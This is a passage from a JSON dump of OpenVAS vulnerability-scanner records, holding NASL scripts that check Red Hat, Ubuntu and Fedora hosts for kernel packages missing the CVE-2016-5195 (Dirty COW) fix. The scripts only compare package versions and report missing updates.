script_xref(name:\"RHSA\", value:\"2016:2105-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-October/msg00051.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~642.6.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~642.6.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.32~642.6.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~642.6.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.32~642.6.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~2.6.32~642.6.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~642.6.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~642.6.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~642.6.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~2.6.32~642.6.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~2.6.32~642.6.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~642.6.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~642.6.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~642.6.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~2.6.32~642.6.2.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:29", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-05T00:00:00", "id": "OPENVAS:1361412562310842975", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842975", "title": "Ubuntu Update for linux USN-3107-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3107-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842975\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-05 09:53:03 +0100 (Mon, 05 Dec 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3107-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n existed in the memory manager of the Linux kernel when handling copy-on-write\n breakage of private read-only memory mappings. A local attacker could use this\n to gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3107-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3107-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-generic\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-generic-lpae\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-lowlatency\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-powerpc-e500mc\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-powerpc-smp\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-powerpc64-emb\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:00", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-11-14T00:00:00", "id": "OPENVAS:1361412562310809956", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809956", "title": "Fedora Update for kernel FEDORA-2016-c3558808cd", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-c3558808cd\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809956\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-14 18:00:31 +0530 (Mon, 14 Nov 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-c3558808cd\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-c3558808cd\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W3APRVDVPDBXLH4DC5UKZVCR742MJIM3\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.7.9~100.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:59", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-05T00:00:00", "id": "OPENVAS:1361412562310842974", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842974", "title": "Ubuntu Update for linux-raspi2 USN-3107-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-raspi2 USN-3107-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842974\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-05 09:53:02 +0100 (Mon, 05 Dec 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-raspi2 USN-3107-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-raspi2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n existed in the memory manager of the Linux kernel when handling copy-on-write\n breakage of private read-only memory mappings. A local attacker could use this\n to gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-raspi2 on Ubuntu 16.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3107-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3107-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-1017-raspi2\", ver:\"4.8.0-1017.20\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:28", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-21T00:00:00", "id": "OPENVAS:1361412562310842924", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842924", "title": "Ubuntu Update for linux-lts-xenial USN-3106-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-xenial USN-3106-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842924\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 05:54:05 +0200 (Fri, 21 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3106-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3106-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding\n updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS\n for Ubuntu 14.04 LTS.\n\nIt was discovered that a race condition existed in the memory manager of\nthe Linux kernel when handling copy-on-write breakage of private read-only\nmemory mappings. A local attacker could use this to gain administrative\nprivileges.\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3106-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3106-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-generic\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-generic-lpae\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-lowlatency\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc-e500mc\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc-smp\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc64-emb\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc64-smp\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:35", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-21T00:00:00", "id": "OPENVAS:1361412562310842922", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842922", "title": "Ubuntu Update for linux USN-3106-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3106-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842922\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 05:54:04 +0200 (Fri, 21 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3106-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition existed\n in the memory manager of the Linux kernel when handling copy-on-write breakage of\n private read-only memory mappings. A local attacker could use this to gain\n administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3106-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3106-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-generic\", ver:\"4.4.0-45.66\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-generic-lpae\", ver:\"4.4.0-45.66\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-lowlatency\", ver:\"4.4.0-45.66\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc-e500mc\", ver:\"4.4.0-45.66\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc-smp\", ver:\"4.4.0-45.66\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc64-emb\", ver:\"4.4.0-45.66\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc64-smp\", ver:\"4.4.0-45.66\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:41", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-21T00:00:00", "id": "OPENVAS:1361412562310842919", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842919", "title": "Ubuntu Update for linux-ti-omap4 USN-3104-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-ti-omap4 USN-3104-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842919\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 05:54:01 +0200 (Fri, 21 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-3104-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n existed in the memory manager of the Linux kernel when handling copy-on-write\n breakage of private read-only memory mappings. A local attacker could use this\n to gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3104-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3104-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1491-omap4\", ver:\"3.2.0-1491.118\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:36", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-21T00:00:00", "id": "OPENVAS:1361412562310842925", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842925", "title": "Ubuntu Update for linux-raspi2 USN-3106-3", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-raspi2 USN-3106-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with 